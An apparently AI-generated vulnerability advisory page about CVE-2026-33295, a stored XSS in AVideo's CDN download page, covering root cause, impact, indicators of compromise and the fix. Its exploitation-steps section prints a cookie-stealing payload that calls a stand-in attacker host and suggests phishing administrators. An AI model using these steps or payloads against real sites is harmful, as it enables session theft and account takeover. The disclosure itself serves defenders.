CVE-2026-33295: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33295 is a stored cross-site scripting (XSS) vulnerability in WWBN/AVideo, affecting all versions up to and including 25.0. The flaw resides in the CDN plugin's downloadButtons.php component, where the clean_title field of a video record is interpolated directly into a JavaScript string literal without escaping, allowing any authenticated user with video creation or editing privileges to inject arbitrary JavaScript. The vulnerability was published on March 18, 2026, and assigned a CVSS v3.1 base score of 5.4 (Medium) and a CVSS v4.0 base score of 8.2 (High) (GitHub Advisory, AVideo Security Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically in plugin/CDN/downloadButtons.php. At the vulnerable line, PHP echoes the clean_title value verbatim inside a single-quoted JavaScript string literal — downloadURLOrAlertError(url, {}, '<php echo $video['clean_title']; ?>.' + format, progress); — without applying any JavaScript-context escaping such as json_encode or htmlspecialchars. An attacker can terminate the string prematurely by including a single quote in the video title and inject arbitrary JavaScript expressions. The attack requires low privileges (any account that can create or edit a video) and network access, with exploitation triggered when any victim user visits the download page for the attacker-controlled video (GitHub Advisory, AVideo Commit).

Impact

Successful exploitation allows the injected JavaScript to execute in the browser of any user — including administrators — who visits the download page for an attacker-controlled video. This enables session cookie theft, credential harvesting, and unauthorized actions performed on behalf of the victim within the application. Because the payload is stored server-side and triggers automatically without further attacker interaction, the blast radius extends to all users who access affected download pages, including privileged accounts (GitHub Advisory, AVideo Security Advisory).

Exploitability

A proof-of-concept (PoC) Python script is publicly available in the official GitHub security advisory, demonstrating login, malicious video creation with the payload ');alert(document.cookie);//, and the trigger URL path — forming a complete reproduction sequence (AVideo Security Advisory). The EPSS score is approximately 0.016% (2nd percentile), indicating low current exploitation probability. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Reconnaissance: Identify an AVideo instance running version 25.0 or earlier. Confirm the CDN plugin is enabled by checking for accessible /plugin/CDN/downloadButtons.php endpoints.
  2. Obtain low-privilege credentials: Register or use an existing low-privilege account that has video creation or editing permissions on the target AVideo instance.
  3. Authenticate: Log in to the AVideo instance using the attacker's credentials via a POST request to /user with user[user] and user[pass] parameters.
  4. Create a malicious video: Submit a POST request to /video/addNew with a crafted title field containing the payload ');alert(document.cookie);// (or a more sophisticated payload for cookie exfiltration, e.g., ');fetch('https://attacker.com/?c='+document.cookie);//).
  5. Retrieve the video ID: Note the videos_id assigned to the newly created video from the server response or by browsing the video listing.
  6. Deliver the trigger URL: Lure a victim (e.g., an administrator) to visit https://target.com/plugin/CDN/downloadButtons.php?videos_id=<ID>. This can be done via phishing, embedding the link in content, or social engineering.
  7. Payload execution: When the victim loads the page, the server renders the unescaped title into the JavaScript context, executing the injected script in the victim's browser and exfiltrating session cookies or performing actions on their behalf (AVideo Security Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains (e.g., attacker-controlled servers) originating from the AVideo application page; unusual GET requests to attacker infrastructure with query parameters containing encoded cookie values.
  • Logs: Web server access logs showing requests to /plugin/CDN/downloadButtons.php?videos_id=<ID> from multiple users, particularly administrators; POST requests to /video/addNew with unusually short or syntactically suspicious titles containing single quotes or JavaScript syntax.
  • Application: Video records in the database with titles containing JavaScript payloads (e.g., single quotes, alert, fetch, document.cookie, // comment sequences).
  • Browser: JavaScript console errors or unexpected alert dialogs when visiting video download pages; session tokens appearing in browser network traffic destined for external hosts (AVideo Security Advisory).

Mitigation and workarounds

The fix was applied in commit 30cdd82, which replaces the verbatim echo of clean_title with json_encode($video['clean_title']), ensuring proper JavaScript-context escaping (AVideo Commit). Administrators should upgrade AVideo to version 26.0 or later as the primary remediation. As additional hardening measures, implement a Content Security Policy (CSP) header to restrict script execution, apply input validation and output encoding for all user-supplied video metadata, and restrict video creation/editing permissions to trusted users only (GitHub Advisory).

Community reactions

The vulnerability was reported by security researcher fg0x0 and published by the AVideo maintainer DanielnetoDotCom on March 18, 2026 (AVideo Security Advisory). A technical write-up was published by Infinitsec covering the stored XSS via unescaped video title in CDN downloadButtons.php (Infinitsec Blog). The vulnerability received routine coverage from vulnerability tracking platforms including VulDB and INCIBE-CERT, with no notable broader media attention or significant community controversy.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management